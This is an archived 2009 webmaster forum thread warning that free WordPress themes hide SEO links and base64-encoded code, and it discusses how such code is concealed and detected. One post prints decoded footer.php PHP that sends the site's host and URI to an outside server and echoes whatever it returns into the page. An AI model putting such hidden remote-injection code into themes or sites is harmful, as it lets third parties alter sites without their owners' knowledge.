Greenguy's Board

Greenguy's Board (http://www.greenguysboard.com/board/index.php)
-   Blogs and Blogging (http://www.greenguysboard.com/board/forumdisplay.php?f=8)
-   -   Warning Using Free WP Themes (http://www.greenguysboard.com/board/showthread.php?t=52632)

walrus 2009-05-03 03:44 PM
Warning Using Free WP Themes
 
Just wanted to give people a heads up, the last two themes I downloaded have had hidden links inside the code for the index file.

They wouldn't show up on the page but were viewable when you looked at the source.

cd34 2009-05-03 03:55 PM
I suspected the same on a client's site that runs multiple wordpress installations that has used multiple free templates. In 5 of the cases, the templates included code in the header.php and sidebar.php that allowed specially crafted strings to allow remote execution. We weren't able to determine whether the modification was made prior to his template being installed or the result of someone having his admin password for a few of the blogs as he didn't have the original template file zips.

walrus 2009-05-03 04:46 PM
None of the stuff I've found, so far, has been malicious but I do suggest anyone using free themes look at them closely.

I've never noticed it before but one of the themes I had issues with was one I'd downloaded about a year ago. I just had never used it.

nate 2009-05-03 07:53 PM
What were the hidden links to? And were they base64 encoded? I've seen a coiuple of those, and could have just decoded and removed the base64 encoded crap, but I ditched the themes instead.

walrus 2009-05-03 09:39 PM
Quote:
Originally Posted by nate (Post 450172)
What were the hidden links to? And were they base64 encoded? I've seen a coiuple of those, and could have just decoded and removed the base64 encoded crap, but I ditched the themes instead.
A lot of themes are doing the base64 encode crap and while there is way too much chance for someone messing with your site, I haven't seen any that were malicious.

These were links written as html but positioned in such a way that they were not visible. One of them redirected to what looks like an old tube site. The others I didn't follow but deleted.

cd34 2009-05-03 10:30 PM
Encoding makes it hard for someone to change the link and remove the link that they are trying to send a little PR to. It is usually wrapped around some other function so that removing it breaks the template somewhat. That's their 'payment' for making the free template.

However, it does make it incredibly easy to hide a malicious payload -- a payload that probably 90% of the internet wouldn't ever notice. If you had something unique enough in the template that you could find sites using it through a google search, you could exploit a few machines.

It is the reason I suspect that the templates were not delivered with exploits, but, modified through the wordpress admin.

whitey 2009-05-05 12:46 PM
Quote:
Originally Posted by walrus (Post 450155)
Just wanted to give people a heads up, the last two themes I downloaded have had hidden links inside the code for the index file.

They wouldn't show up on the page but were viewable when you looked at the source.
Also, check the footers of any free template. Quite a few have hidden links or Base 64 code. I simply do not use them or eliminate the code.

teenrave 2009-05-05 01:19 PM
I checked mine and luckily didn't have any crap in there. But yeah defiantly want to check and make sure there isn't something that might change your blog without your knowing it.

nate 2009-05-07 12:04 AM
Quote:
check the footers of any free template
Not just the footers. It could be in any file.

Maj. Stress 2009-05-07 12:41 AM
Maybe This will help. Read the entries towards the bottom of the page.

cd34 2009-05-07 01:05 AM
The problem is that when you decode it like that, you see the rendered code. So, if there was a widget called in the footer, you would have the rendered widget and you couldn't use the wordpress admin to control it.

Secondly, if you do view the rendered text and think, ok, I'm good with what is being displayed, you would miss any possible exploits that require certain parameters or header values and you wouldn't be able to see the actual code being executed.

I wouldn't use that as a safety net, though, if it didn't include your existing footer widgets, then I would think you should be ok.

What I'm starting to see somewhat frequently is that they are wrapping integral page functions into their encoding to prevent you from blindly removing the encoded block.

HowlingWulf 2009-05-27 04:42 PM
I just downloaded a free WP theme and I like to check the code as well, so I decoded the footer.php and found

Code:
error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
        echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
        $content = @file($CodeURL);
        echo @join("", $content);
} elseif (function_exists("curl_init")) {
        $ch = curl_init($CodeURL);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
}
I'm not sure what it's doing, but I don't like it.

cd34 2009-05-27 05:03 PM
They are grabbing a link from their rotator script based on the domain that is requesting it. They would be able to change the links displayed in the footer based on your domain name.

burntfilm 2009-05-31 03:28 PM
thanks for the heads up

babymaker 2009-06-13 08:01 PM
download the TAC plugin dont have like but google it works great to scan your themes :)

onehotasianbabe 2009-06-16 02:07 AM
Is it possible to have the names of those WP themes, Thanks for bringing this up.

kickass 2009-06-16 11:13 AM
mmm, thanks for letting us know!

walrus 2009-06-16 01:48 PM
Quote:
Originally Posted by onehotasianbabe (Post 454324)
Is it possible to have the names of those WP themes, Thanks for bringing this up.
Seriously, there are too many to list. Most of the ones created within the last year seem to have encoded footers at least.

babymaker 2009-06-16 06:13 PM
Quote:
Originally Posted by onehotasianbabe (Post 454324)
Is it possible to have the names of those WP themes, Thanks for bringing this up.

as was previously posted, too many too list and who know what you are using, some of them, it's not malicious, it's just them maybe taking some probably crap traffic that didn't already buy from you posts in the bottom footer, so those, if the theme is good seo wise and looks good, go ahead and use it, i mean it's free and they person who made it might as well make a bit of cash for their hard work, but others do has evil code in them, download the TAC plugin that i listed earlier and test the theme.

unleashthefury 2009-06-17 05:26 AM
thanks, before reading this all I've just thought editing index file and deleting links will help, but everything seems to be a lot more complicated. Thanks again.


All times are GMT -4. The time now is 02:18 AM.

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc